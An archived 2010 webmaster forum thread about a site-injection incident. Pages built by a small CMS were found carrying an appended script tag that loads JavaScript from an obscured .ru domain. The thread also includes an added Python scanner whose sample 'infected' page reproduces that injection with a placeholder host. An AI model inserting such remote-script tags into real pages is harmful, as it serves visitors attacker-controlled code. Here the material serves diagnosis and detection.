Malware alert from Google

Try to find out from where

         

jetteroheller

9:35 pm on Aug 22, 2010 (gmt 0)



Just received 2 malware alerts from Google.

Both domains are from one of my clients.
My client is on holiday right now,
so I cannot check his computer.

In all cases, at the end of the HTML file, after the </BODY>,
this appears:

<script type="text/javascript" src="http://******.ru/Base_Station.js"></script>
<!--87dbfb1e3d8895fc7e5012f8de4337d0-->

All the files are created by my own CMS;
my client works with the CMS.

So there are these theories:

1) Malware on my client's computers checks all stored *.htm files and attaches the script
2) The FTP program is infected and attaches the script
3) On the way to the server
4) The server is infected

Which of these theories is the most realistic?

[edited by: tedster at 10:04 pm (utc) on Aug 22, 2010]
[edit reason] obscure the malware domain [/edit]
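An added example, not part of the original thread: a small Python scanner for the pattern described in the post above (a script tag and a 32-hex-digit comment placed after the closing </BODY>), which can be run over both the local CMS output and a copy downloaded from the server to see where the files were changed. The function names, the `injected.example` host and the sample pages are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

BODY_END = re.compile(r"</body\s*>", re.I)
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
HEX_MARKER = re.compile(r"<!--\s*([0-9a-f]{32})\s*-->", re.I)  # comment of 32 hex digits

# Constructed samples; injected.example is a placeholder host.
CLEAN = "<html><body><p>Hello</p><script src='/menu.js'></script></body></html>"
INFECTED = ("<HTML><BODY><p>Hello</p></BODY>\n"
            '<script type="text/javascript" src="http://injected.example/x.js"></script>\n'
            "<!--0123456789abcdef0123456789abcdef-->\n</HTML>")

def inspect_html(text, allowed_hosts=()):
    """Report script tags and 32-hex comments found after the last </body>."""
    ends = list(BODY_END.finditer(text))
    if not ends:
        return []  # no closing tag, nothing to anchor on
    tail = text[ends[-1].end():]
    findings = []
    for src in SCRIPT_SRC.findall(tail):
        host = (urlsplit(src).hostname or "").lower()
        if host not in allowed_hosts:  # a relative src (host "") is reported too
            findings.append(("script-after-body", src))
    findings += [("hex-marker", m.lower()) for m in HEX_MARKER.findall(tail)]
    return findings

def scan_tree(root, allowed_hosts=()):
    """Scan every .htm/.html file under root; return {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".htm", ".html"}:
            text = path.read_text(encoding="utf-8", errors="replace")
            found = inspect_html(text, allowed_hosts)
            if found:
                hits[str(path)] = found
    return hits

def demo():
    """Write both samples into a temporary tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "news").mkdir()
        (root / "index.html").write_text(CLEAN, encoding="utf-8")
        (root / "news" / "b.htm").write_text(INFECTED, encoding="utf-8")
        return {Path(p).relative_to(root).as_posix(): f
                for p, f in scan_tree(root).items()}
```

Hits in the server copy but not in the freshly generated local files point away from the local-disk theory and toward the upload path or the server.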

lammert

9:57 pm on Aug 22, 2010 (gmt 0)



5) Your CMS software is hackable. It wouldn't be the first CMS system which can be compromised. Is it flat file based or scripts with an SQL database?

Independent of the source of the infection, it may not have been a wise idea to publish the malware URL here. People might innocently copy and paste it into the address bar of their browser and get infected.

encyclo

10:09 pm on Aug 22, 2010 (gmt 0)



Another possibility is that you or the client has malware on your/their machine and your Filezilla passwords have been swiped. (Filezilla stored passwords in a plain-text file in a known location, so it is easily targeted.)

If this is the case, clean up everything locally first, change all passwords for all sites stored in Filezilla, and upload from safe backups.

jetteroheller

6:20 am on Aug 23, 2010 (gmt 0)



My CMS is written in PERL as an HTA (Hyper Text Application) with MSIE as the GUI. It's used by fewer than 20 users.

My CMS creates all the HTML files locally on one's own computer.
Communication with the server is only by FTP.

My CMS uses MoveItFreely as FTP to transfer the files to the server.